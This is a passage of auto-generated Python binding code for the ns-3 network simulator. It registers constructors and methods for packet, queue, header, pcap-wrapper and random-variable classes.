## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable(double m, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 'b')])
return
def register_Ns3FlowIdTag_methods(root_module, cls):
## flow-id-tag.h (module 'network'): ns3::FlowIdTag::FlowIdTag(ns3::FlowIdTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::FlowIdTag const &', 'arg0')])
## flow-id-tag.h (module 'network'): ns3::FlowIdTag::FlowIdTag() [constructor]
cls.add_constructor([])
## flow-id-tag.h (module 'network'): ns3::FlowIdTag::FlowIdTag(uint32_t flowId) [constructor]
cls.add_constructor([param('uint32_t', 'flowId')])
## flow-id-tag.h (module 'network'): static uint32_t ns3::FlowIdTag::AllocateFlowId() [member function]
cls.add_method('AllocateFlowId',
'uint32_t',
[],
is_static=True)
## flow-id-tag.h (module 'network'): void ns3::FlowIdTag::Deserialize(ns3::TagBuffer buf) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'buf')],
is_virtual=True)
## flow-id-tag.h (module 'network'): uint32_t ns3::FlowIdTag::GetFlowId() const [member function]
cls.add_method('GetFlowId',
'uint32_t',
[],
is_const=True)
## flow-id-tag.h (module 'network'): ns3::TypeId ns3::FlowIdTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## flow-id-tag.h (module 'network'): uint32_t ns3::FlowIdTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## flow-id-tag.h (module 'network'): static ns3::TypeId ns3::FlowIdTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## flow-id-tag.h (module 'network'): void ns3::FlowIdTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## flow-id-tag.h (module 'network'): void ns3::FlowIdTag::Serialize(ns3::TagBuffer buf) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'buf')],
is_const=True, is_virtual=True)
## flow-id-tag.h (module 'network'): void ns3::FlowIdTag::SetFlowId(uint32_t flowId) [member function]
cls.add_method('SetFlowId',
'void',
[param('uint32_t', 'flowId')])
return
def register_Ns3GammaVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::GammaVariable::GammaVariable(ns3::GammaVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::GammaVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::GammaVariable::GammaVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::GammaVariable::GammaVariable(double alpha, double beta) [constructor]
cls.add_constructor([param('double', 'alpha'), param('double', 'beta')])
## random-variable.h (module 'core'): double ns3::GammaVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::GammaVariable::GetValue(double alpha, double beta) const [member function]
cls.add_method('GetValue',
'double',
[param('double', 'alpha'), param('double', 'beta')],
is_const=True)
return
def register_Ns3Header_methods(root_module, cls):
cls.add_output_stream_operator()
## header.h (module 'network'): ns3::Header::Header() [constructor]
cls.add_constructor([])
## header.h (module 'network'): ns3::Header::Header(ns3::Header const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Header const &', 'arg0')])
## header.h (module 'network'): uint32_t ns3::Header::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_virtual=True)
## header.h (module 'network'): uint32_t ns3::Header::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## header.h (module 'network'): static ns3::TypeId ns3::Header::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## header.h (module 'network'): void ns3::Header::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## header.h (module 'network'): void ns3::Header::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3IntEmpiricalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::IntEmpiricalVariable::IntEmpiricalVariable(ns3::IntEmpiricalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntEmpiricalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::IntEmpiricalVariable::IntEmpiricalVariable() [constructor]
cls.add_constructor([])
return
def register_Ns3LlcSnapHeader_methods(root_module, cls):
## llc-snap-header.h (module 'network'): ns3::LlcSnapHeader::LlcSnapHeader(ns3::LlcSnapHeader const & arg0) [copy constructor]
cls.add_constructor([param('ns3::LlcSnapHeader const &', 'arg0')])
## llc-snap-header.h (module 'network'): ns3::LlcSnapHeader::LlcSnapHeader() [constructor]
cls.add_constructor([])
## llc-snap-header.h (module 'network'): uint32_t ns3::LlcSnapHeader::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## llc-snap-header.h (module 'network'): ns3::TypeId ns3::LlcSnapHeader::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## llc-snap-header.h (module 'network'): uint32_t ns3::LlcSnapHeader::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## llc-snap-header.h (module 'network'): uint16_t ns3::LlcSnapHeader::GetType() [member function]
cls.add_method('GetType',
'uint16_t',
[])
## llc-snap-header.h (module 'network'): static ns3::TypeId ns3::LlcSnapHeader::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## llc-snap-header.h (module 'network'): void ns3::LlcSnapHeader::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## llc-snap-header.h (module 'network'): void ns3::LlcSnapHeader::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## llc-snap-header.h (module 'network'): void ns3::LlcSnapHeader::SetType(uint16_t type) [member function]
cls.add_method('SetType',
'void',
[param('uint16_t', 'type')])
return
def register_Ns3LogNormalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::LogNormalVariable::LogNormalVariable(ns3::LogNormalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::LogNormalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::LogNormalVariable::LogNormalVariable(double mu, double sigma) [constructor]
cls.add_constructor([param('double', 'mu'), param('double', 'sigma')])
return
def register_Ns3NormalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable(ns3::NormalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NormalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable(double m, double v) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 'v')])
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable(double m, double v, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 'v'), param('double', 'b')])
return
def register_Ns3Object_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::Object() [constructor]
cls.add_constructor([])
## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function]
cls.add_method('AggregateObject',
'void',
[param('ns3::Ptr< ns3::Object >', 'other')])
## object.h (module 'core'): void ns3::Object::Dispose() [member function]
cls.add_method('Dispose',
'void',
[])
## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function]
cls.add_method('GetAggregateIterator',
'ns3::Object::AggregateIterator',
[],
is_const=True)
## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object.h (module 'core'): void ns3::Object::Start() [member function]
cls.add_method('Start',
'void',
[])
## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor]
cls.add_constructor([param('ns3::Object const &', 'o')],
visibility='protected')
## object.h (module 'core'): void ns3::Object::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function]
cls.add_method('NotifyNewAggregate',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor]
cls.add_constructor([])
## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function]
cls.add_method('Next',
'ns3::Ptr< ns3::Object const >',
[])
return
def register_Ns3PacketBurst_methods(root_module, cls):
## packet-burst.h (module 'network'): ns3::PacketBurst::PacketBurst(ns3::PacketBurst const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketBurst const &', 'arg0')])
## packet-burst.h (module 'network'): ns3::PacketBurst::PacketBurst() [constructor]
cls.add_constructor([])
## packet-burst.h (module 'network'): void ns3::PacketBurst::AddPacket(ns3::Ptr<ns3::Packet> packet) [member function]
cls.add_method('AddPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet')])
## packet-burst.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::Packet> > ns3::PacketBurst::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::Ptr< ns3::Packet > >',
[],
is_const=True)
## packet-burst.h (module 'network'): ns3::Ptr<ns3::PacketBurst> ns3::PacketBurst::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::PacketBurst >',
[],
is_const=True)
## packet-burst.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::Packet> > ns3::PacketBurst::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::Ptr< ns3::Packet > >',
[],
is_const=True)
## packet-burst.h (module 'network'): uint32_t ns3::PacketBurst::GetNPackets() const [member function]
cls.add_method('GetNPackets',
'uint32_t',
[],
is_const=True)
## packet-burst.h (module 'network'): std::list<ns3::Ptr<ns3::Packet>, std::allocator<ns3::Ptr<ns3::Packet> > > ns3::PacketBurst::GetPackets() const [member function]
cls.add_method('GetPackets',
'std::list< ns3::Ptr< ns3::Packet > >',
[],
is_const=True)
## packet-burst.h (module 'network'): uint32_t ns3::PacketBurst::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## packet-burst.h (module 'network'): static ns3::TypeId ns3::PacketBurst::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## packet-burst.h (module 'network'): void ns3::PacketBurst::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3ParetoVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(ns3::ParetoVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ParetoVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(double m) [constructor]
cls.add_constructor([param('double', 'm')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(double m, double s) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(double m, double s, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's'), param('double', 'b')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(std::pair<double,double> params) [constructor]
cls.add_constructor([param('std::pair< double, double >', 'params')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(std::pair<double,double> params, double b) [constructor]
cls.add_constructor([param('std::pair< double, double >', 'params'), param('double', 'b')])
return
def register_Ns3PcapFileWrapper_methods(root_module, cls):
## pcap-file-wrapper.h (module 'network'): static ns3::TypeId ns3::PcapFileWrapper::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## pcap-file-wrapper.h (module 'network'): ns3::PcapFileWrapper::PcapFileWrapper() [constructor]
cls.add_constructor([])
## pcap-file-wrapper.h (module 'network'): bool ns3::PcapFileWrapper::Fail() const [member function]
cls.add_method('Fail',
'bool',
[],
is_const=True)
## pcap-file-wrapper.h (module 'network'): bool ns3::PcapFileWrapper::Eof() const [member function]
cls.add_method('Eof',
'bool',
[],
is_const=True)
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Open(std::string const & filename, std::_Ios_Openmode mode) [member function]
cls.add_method('Open',
'void',
[param('std::string const &', 'filename'), param('std::_Ios_Openmode', 'mode')])
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Close() [member function]
cls.add_method('Close',
'void',
[])
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Init(uint32_t dataLinkType, uint32_t snapLen=std::numeric_limits<unsigned int>::max(), int32_t tzCorrection=ns3::PcapFile::ZONE_DEFAULT) [member function]
cls.add_method('Init',
'void',
[param('uint32_t', 'dataLinkType'), param('uint32_t', 'snapLen', default_value='std::numeric_limits<unsigned int>::max()'), param('int32_t', 'tzCorrection', default_value='ns3::PcapFile::ZONE_DEFAULT')])
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Write(ns3::Time t, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('Write',
'void',
[param('ns3::Time', 't'), param('ns3::Ptr< ns3::Packet const >', 'p')])
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Write(ns3::Time t, ns3::Header & header, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('Write',
'void',
[param('ns3::Time', 't'), param('ns3::Header &', 'header'), param('ns3::Ptr< ns3::Packet const >', 'p')])
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Write(ns3::Time t, uint8_t const * buffer, uint32_t length) [member function]
cls.add_method('Write',
'void',
[param('ns3::Time', 't'), param('uint8_t const *', 'buffer'), param('uint32_t', 'length')])
## pcap-file-wrapper.h (module 'network'): uint32_t ns3::PcapFileWrapper::GetMagic() [member function]
cls.add_method('GetMagic',
'uint32_t',
[])
## pcap-file-wrapper.h (module 'network'): uint16_t ns3::PcapFileWrapper::GetVersionMajor() [member function]
cls.add_method('GetVersionMajor',
'uint16_t',
[])
## pcap-file-wrapper.h (module 'network'): uint16_t ns3::PcapFileWrapper::GetVersionMinor() [member function]
cls.add_method('GetVersionMinor',
'uint16_t',
[])
## pcap-file-wrapper.h (module 'network'): int32_t ns3::PcapFileWrapper::GetTimeZoneOffset() [member function]
cls.add_method('GetTimeZoneOffset',
'int32_t',
[])
## pcap-file-wrapper.h (module 'network'): uint32_t ns3::PcapFileWrapper::GetSigFigs() [member function]
cls.add_method('GetSigFigs',
'uint32_t',
[])
## pcap-file-wrapper.h (module 'network'): uint32_t ns3::PcapFileWrapper::GetSnapLen() [member function]
cls.add_method('GetSnapLen',
'uint32_t',
[])
## pcap-file-wrapper.h (module 'network'): uint32_t ns3::PcapFileWrapper::GetDataLinkType() [member function]
cls.add_method('GetDataLinkType',
'uint32_t',
[])
return
def register_Ns3Queue_methods(root_module, cls):
## queue.h (module 'network'): ns3::Queue::Queue(ns3::Queue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Queue const &', 'arg0')])
## queue.h (module 'network'): ns3::Queue::Queue() [constructor]
cls.add_constructor([])
## queue.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Queue::Dequeue() [member function]
cls.add_method('Dequeue',
'ns3::Ptr< ns3::Packet >',
[])
## queue.h (module 'network'): void ns3::Queue::DequeueAll() [member function]
cls.add_method('DequeueAll',
'void',
[])
## queue.h (module 'network'): bool ns3::Queue::Enqueue(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('Enqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')])
## queue.h (module 'network'): uint32_t ns3::Queue::GetNBytes() const [member function]
cls.add_method('GetNBytes',
'uint32_t',
[],
is_const=True)
## queue.h (module 'network'): uint32_t ns3::Queue::GetNPackets() const [member function]
cls.add_method('GetNPackets',
'uint32_t',
[],
is_const=True)
## queue.h (module 'network'): uint32_t ns3::Queue::GetTotalDroppedBytes() const [member function]
cls.add_method('GetTotalDroppedBytes',
'uint32_t',
[],
is_const=True)
## queue.h (module 'network'): uint32_t ns3::Queue::GetTotalDroppedPackets() const [member function]
cls.add_method('GetTotalDroppedPackets',
'uint32_t',
[],
is_const=True)
## queue.h (module 'network'): uint32_t ns3::Queue::GetTotalReceivedBytes() const [member function]
cls.add_method('GetTotalReceivedBytes',
'uint32_t',
[],
is_const=True)
## queue.h (module 'network'): uint32_t ns3::Queue::GetTotalReceivedPackets() const [member function]
cls.add_method('GetTotalReceivedPackets',
'uint32_t',
[],
is_const=True)
## queue.h (module 'network'): static ns3::TypeId ns3::Queue::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## queue.h (module 'network'): bool ns3::Queue::IsEmpty() const [member function]
cls.add_method('IsEmpty',
'bool',
[],
is_const=True)
## queue.h (module 'network'): ns3::Ptr<const ns3::Packet> ns3::Queue::Peek() const [member function]
cls.add_method('Peek',
'ns3::Ptr< ns3::Packet const >',
[],
is_const=True)
## queue.h (module 'network'): void ns3::Queue::ResetStatistics() [member function]
cls.add_method('ResetStatistics',
'void',
[])
## queue.h (module 'network'): void ns3::Queue::Drop(ns3::Ptr<ns3::Packet> packet) [member function]
cls.add_method('Drop',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet')],
visibility='protected')
## queue.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Queue::DoDequeue() [member function]
cls.add_method('DoDequeue',
'ns3::Ptr< ns3::Packet >',
[],
is_pure_virtual=True, visibility='private', is_virtual=True)
## queue.h (module 'network'): bool ns3::Queue::DoEnqueue(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoEnqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
is_pure_virtual=True, visibility='private', is_virtual=True)
## queue.h (module 'network'): ns3::Ptr<const ns3::Packet> ns3::Queue::DoPeek() const [member function]
cls.add_method('DoPeek',
'ns3::Ptr< ns3::Packet const >',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3RadiotapHeader_methods(root_module, cls):
## radiotap-header.h (module 'network'): ns3::RadiotapHeader::RadiotapHeader(ns3::RadiotapHeader const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RadiotapHeader const &', 'arg0')])
## radiotap-header.h (module 'network'): ns3::RadiotapHeader::RadiotapHeader() [constructor]
cls.add_constructor([])
## radiotap-header.h (module 'network'): uint32_t ns3::RadiotapHeader::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## radiotap-header.h (module 'network'): uint8_t ns3::RadiotapHeader::GetAntennaNoisePower() const [member function]
cls.add_method('GetAntennaNoisePower',
'uint8_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): uint8_t ns3::RadiotapHeader::GetAntennaSignalPower() const [member function]
cls.add_method('GetAntennaSignalPower',
'uint8_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): uint16_t ns3::RadiotapHeader::GetChannelFlags() const [member function]
cls.add_method('GetChannelFlags',
'uint16_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): uint16_t ns3::RadiotapHeader::GetChannelFrequency() const [member function]
cls.add_method('GetChannelFrequency',
'uint16_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): uint8_t ns3::RadiotapHeader::GetFrameFlags() const [member function]
cls.add_method('GetFrameFlags',
'uint8_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): ns3::TypeId ns3::RadiotapHeader::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## radiotap-header.h (module 'network'): uint8_t ns3::RadiotapHeader::GetRate() const [member function]
cls.add_method('GetRate',
'uint8_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): uint32_t ns3::RadiotapHeader::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## radiotap-header.h (module 'network'): uint64_t ns3::RadiotapHeader::GetTsft() const [member function]
cls.add_method('GetTsft',
'uint64_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): static ns3::TypeId ns3::RadiotapHeader::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::SetAntennaNoisePower(double noise) [member function]
cls.add_method('SetAntennaNoisePower',
'void',
[param('double', 'noise')])
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::SetAntennaSignalPower(double signal) [member function]
cls.add_method('SetAntennaSignalPower',
'void',
[param('double', 'signal')])
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::SetChannelFrequencyAndFlags(uint16_t frequency, uint16_t flags) [member function]
cls.add_method('SetChannelFrequencyAndFlags',
'void',
[param('uint16_t', 'frequency'), param('uint16_t', 'flags')])
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::SetFrameFlags(uint8_t flags) [member function]
cls.add_method('SetFrameFlags',
'void',
[param('uint8_t', 'flags')])
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::SetRate(uint8_t rate) [member function]
cls.add_method('SetRate',
'void',
[param('uint8_t', 'rate')])
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::SetTsft(uint64_t tsft) [member function]
cls.add_method('SetTsft',
'void',
[param('uint64_t', 'tsft')])
return
def register_Ns3RedQueue_methods(root_module, cls):
## red-queue.h (module 'network'): ns3::RedQueue::RedQueue(ns3::RedQueue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RedQueue const &', 'arg0')])
## red-queue.h (module 'network'): ns3::RedQueue::RedQueue() [constructor]
cls.add_constructor([])
## red-queue.h (module 'network'): ns3::Queue::QueueMode ns3::RedQueue::GetMode() [member function]
cls.add_method('GetMode',
'ns3::Queue::QueueMode',
[])
## red-queue.h (module 'network'): uint32_t ns3::RedQueue::GetQueueSize() [member function]
cls.add_method('GetQueueSize',
'uint32_t',
[])
## red-queue.h (module 'network'): ns3::RedQueue::Stats ns3::RedQueue::GetStats() [member function]
cls.add_method('GetStats',
'ns3::RedQueue::Stats',
[])
## red-queue.h (module 'network'): static ns3::TypeId ns3::RedQueue::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## red-queue.h (module 'network'): void ns3::RedQueue::SetMode(ns3::Queue::QueueMode mode) [member function]
cls.add_method('SetMode',
'void',
[param('ns3::Queue::QueueMode', 'mode')])
## red-queue.h (module 'network'): void ns3::RedQueue::SetQueueLimit(uint32_t lim) [member function]
cls.add_method('SetQueueLimit',
'void',
[param('uint32_t', 'lim')])
## red-queue.h (module 'network'): void ns3::RedQueue::SetTh(double minTh, double maxTh) [member function]
cls.add_method('SetTh',
'void',
[param('double', 'minTh'), param('double', 'maxTh')])
## red-queue.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::RedQueue::DoDequeue() [member function]
cls.add_method('DoDequeue',
'ns3::Ptr< ns3::Packet >',
[],
visibility='private', is_virtual=True)
## red-queue.h (module 'network'): bool ns3::RedQueue::DoEnqueue(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoEnqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## red-queue.h (module 'network'): ns3::Ptr<const ns3::Packet> ns3::RedQueue::DoPeek() const [member function]
cls.add_method('DoPeek',
'ns3::Ptr< ns3::Packet const >',
[],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3RedQueueStats_methods(root_module, cls):
## red-queue.h (module 'network'): ns3::RedQueue::Stats::Stats() [constructor]
cls.add_constructor([])
## red-queue.h (module 'network'): ns3::RedQueue::Stats::Stats(ns3::RedQueue::Stats const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RedQueue::Stats const &', 'arg0')])
## red-queue.h (module 'network'): ns3::RedQueue::Stats::forcedDrop [variable]
cls.add_instance_attribute('forcedDrop', 'uint32_t', is_const=False)
## red-queue.h (module 'network'): ns3::RedQueue::Stats::qLimDrop [variable]
cls.add_instance_attribute('qLimDrop', 'uint32_t', is_const=False)
## red-queue.h (module 'network'): ns3::RedQueue::Stats::unforcedDrop [variable]
cls.add_instance_attribute('unforcedDrop', 'uint32_t', is_const=False)
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
